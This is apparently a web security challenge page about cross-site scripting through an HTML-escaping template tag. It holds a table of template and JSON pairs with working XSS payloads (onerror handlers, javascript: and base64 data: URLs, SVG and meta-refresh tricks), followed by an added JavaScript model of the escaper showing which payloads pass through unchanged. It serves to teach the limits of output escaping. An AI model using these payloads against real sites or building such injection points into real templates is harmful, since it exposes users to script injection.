Challenge: Are you able to run script from a value in the JSON within the template when the template is trying to escape the data?
When you click the Render button, the untrusted data in the JSON will be applied to the trusted template, and the output will be displayed on the left. Your goal is to have JS from a JSON value run even though <%= variable %> is used to output the value containing the attack.
Rules:
- <% javascript %> - run javascript
- <%= variable %> - output contents of variable escaped
- <%- variable %> - output contents of variable unescaped

Email me or DM me on twitter if you find anything interesting.
Template | JSON |
---|---|
<<%= foo %>> | { "foo" : "img onerror='alert(1)' src=" } |
<form id=x><button form=x formaction="<%= y %>">CLICKME | {"y":"javascript:alert(1)"} |
<div style=mask:url(<%= title %>)></div> | |
<form action="<%= x %>"><<button> | {"x":"javascript:alert(1)"} |
<img src=<%= a %> /><%= b %> | {"a":"'x","b":"'onerror=alert(1)//"} |
<a href=<%=url%> title="Buy <%=number%> at <%=price%> = $<%=cost%>/month AND SAVE $$$">BUY NOW</a> | {"url":"","number":42,"price":"onmouseover","cost":"=alert(1)/"} |
<svg> <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#"> <set attributeName="xlink:href" begin="0s" to="<%= x %>" /><circle r=40> </a> </svg> | {"x":"javascript:alert(1)"} |
<object data="<%= boob %>"></object> | {"boob":"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="} |
<input type="text" value=``<"<%=x%>"><%=x%></div> | { "x":"div/onmouseover='alert(1)" } |
<object type="text/x-scriptlet" data="<%=x%>"</object> | { "x":"jsfiddle.net/XLE63/" } |
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('<%=x%>')> | {"x":"\u0061"} |
<meta http-equiv="refresh" content="0;url=<%= description %>"> | {"description": "javascript:alert(document.domain)"} |
<a link="<%= d %>" style="-o-link:attr(link);-o-link-source:current">click me</a> | {"description": "data:text/html,<script>alert(document.domain);</script>"} |
<iframe srcdoc='<svg/onload=<%=x%>>'> | {"x":"alert(6)"} |
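To make the rules concrete, here is an added example (my own model, not the challenge page's renderer) of what an escaping <%= %> tag does to some of the submissions in the table. It assumes the escaper touches the conventional EJS-style set of five characters (& < > " '); the real challenge engine may use a different set, so treat the output as an illustration of the rules, not as ground truth for the page. The template and JSON pairs are constructed by copying rows from the table.

```javascript
// Added example, not the challenge page's own renderer. Assumption: <%= %>
// escapes the EJS-style set & < > " ' and <%- %> emits the value raw.
const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&#34;', "'": '&#39;' };

// Escape the five characters HTML escapers conventionally touch.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => ESCAPES[c]);
}

// Minimal renderer for the two output tags only. <% javascript %> blocks are
// not modelled: untrusted JSON values never reach one in the challenge.
function render(template, data) {
  return template.replace(/<%([=-])\s*([\w$]+)\s*%>/g, (_, mode, name) => {
    const value = Object.prototype.hasOwnProperty.call(data, name) ? data[name] : '';
    return mode === '=' ? escapeHtml(value) : String(value);
  });
}

// Constructed samples copied from the table above; every one uses the
// escaping <%= %> tag.
const SAMPLES = [
  { template: '<<%= foo %>>', data: { foo: "img onerror='alert(1)' src=" } },
  { template: '<form action="<%= x %>"><button>CLICKME</button></form>', data: { x: 'javascript:alert(1)' } },
  { template: '<img src=<%= a %> /><%= b %>', data: { a: "'x", b: "'onerror=alert(1)//" } },
  { template: '<meta http-equiv="refresh" content="0;url=<%= description %>">', data: { description: 'javascript:alert(document.domain)' } },
  { template: '<object data="<%= boob %>"></object>', data: { boob: 'data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==' } },
];

// Render each sample and record whether escaping changed any value at all.
// untouched === true means the escaper had nothing to do: the payload contains
// none of the five characters, so the attack depends entirely on the sink the
// template put the value into (a URL attribute) rather than on breaking out
// of the markup.
function renderAll(samples = SAMPLES) {
  return samples.map(({ template, data }) => ({
    template,
    output: render(template, data),
    untouched: Object.values(data).every((v) => escapeHtml(v) === String(v)),
  }));
}

for (const r of renderAll()) {
  console.log(`${r.untouched ? 'UNTOUCHED' : 'escaped  '} ${r.output}`);
}
```

The point the output makes: quote-breaking payloads such as `img onerror='alert(1)' src=` come out with `&#39;` where their quotes were, while `javascript:` and `data:` URLs pass through the escaper byte for byte. Whether a browser then executes the untouched result is exactly what each row of the table is testing; this example only shows what the escaper emits.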